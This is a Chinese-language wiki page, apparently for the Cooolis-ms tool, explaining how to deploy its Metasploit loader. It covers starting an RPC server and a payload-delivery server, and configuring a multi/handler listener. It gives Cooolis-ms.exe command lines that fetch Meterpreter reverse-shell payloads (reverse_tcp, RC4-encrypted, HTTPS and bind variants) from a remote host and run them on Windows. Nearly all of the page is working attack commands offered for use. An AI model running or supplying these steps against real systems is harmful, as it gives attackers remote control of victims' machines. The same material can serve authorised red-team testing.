Skip to content

module metasploit

倾旋 edited this page Oct 12, 2020 · 2 revisions

如果你要使用metasploit子命令,则需要配置好服务端用于发送载荷。

提示:非常建议使用Docker部署

如何安装

Docker部署(推荐)

Bilibili:

China Bilibili

$ git clone https://github.com/Rvn0xsy/Cooolis-ms.git
$ cd Cooolis-ms/Docker
$ docker-compose up -d

默认监听端口:8899

源码部署

$ git clone https://github.com/Rvn0xsy/Cooolis-ms.git
$ cd Cooolis-ms
$ pip3 install -r requirements.txt

第一步 启动Metasploit RPC服务端

假设这是我的VPS: 10.20.56.41 启动Metasploit RPC服务端:

$ msfrpcd -U msf -P msf -u /api/1.0/ -a 127.0.0.1

第二步 启动Cooolis-ms服务端

使得它连接到RPC,并且监听一个端口,用来发送载荷:

$ python3 server.py -U msf -P msf -H 127.0.0.1 -p 55553 -s -v -l 8899 -S 10.20.56.41

第三步 配置Metasploit监听器

msf5 > use exploit/multi/handler
msf5 > set payload windows/meterpreter/reverse_tcp
msf5 > set LHOST  10.20.56.41
msf5 > set LPORT 8876
msf5 > exploit -j

使用例子

参数说明:

[~\Documents\Cooolis-ms\Cooolis-ms-Loader\Release]> .\Cooolis-ms.exe metasploit -h
Metasploit RPC Loader
Usage: C:\Users\Administrator\Documents\Cooolis-ms\Cooolis-ms-Loader\Release\Cooolis-ms.exe metasploit [OPTIONS]

Options:
  -h,--help                   Print this help message and exit
  -p,--payload TEXT=windows/meterpreter/reverse_tcp
                              Payload Name, e.g. windows/meterpreter/reverse_tcp
  -o,--options TEXT           Payload options, e.g. LHOST=1.1.1.1,LPORT=8866
  -P,--PORT UINT:INT in [1 - 65535]=8899 REQUIRED
                              RPC Server Port
  -H,--HOST TEXT:IPV4 REQUIRED
                              RPC Server Host

  • windows/meterpreter/reverse_tcp:
Cooolis-ms.exe metasploit -p windows/meterpreter/reverse_tcp -o LHOST=10.20.56.41,LPORT=8876,Format=dll -H 10.20.56.41 -P 8899

Q&A : 是否支持RC4加密的Payload?

  • windows/meterpreter/reverse_tcp_rc4:
Cooolis-ms.exe metasploit -p windows/meterpreter/reverse_tcp_rc4 -o LHOST=10.20.56.41,LPORT=8876,RC4PASSWORD=rc4_password,Format=dll -H 10.20.56.41 -P 8899
  • windows/meterpreter_reverse_https
Cooolis-ms.exe metasploit -p windows/meterpreter_reverse_https -o LHOST=10.20.56.41,LPORT=8876,LURI=/api/,Format=dll -H 10.20.56.41 -P 8899
  • windows/meterpreter/bind_tcp_rc4
Cooolis-ms.exe metasploit -p windows/meterpreter/bind_tcp_rc4 -o RHOST=10.20.56.11,LPORT=8876,LURI=/api/,Format=dll -H 10.20.56.41 -P 8899

关于其他

如果你觉得这个项目不错,请给我一个Star~

issue

我要提交建议或问题

LICENSE

GNU General Public License v3.0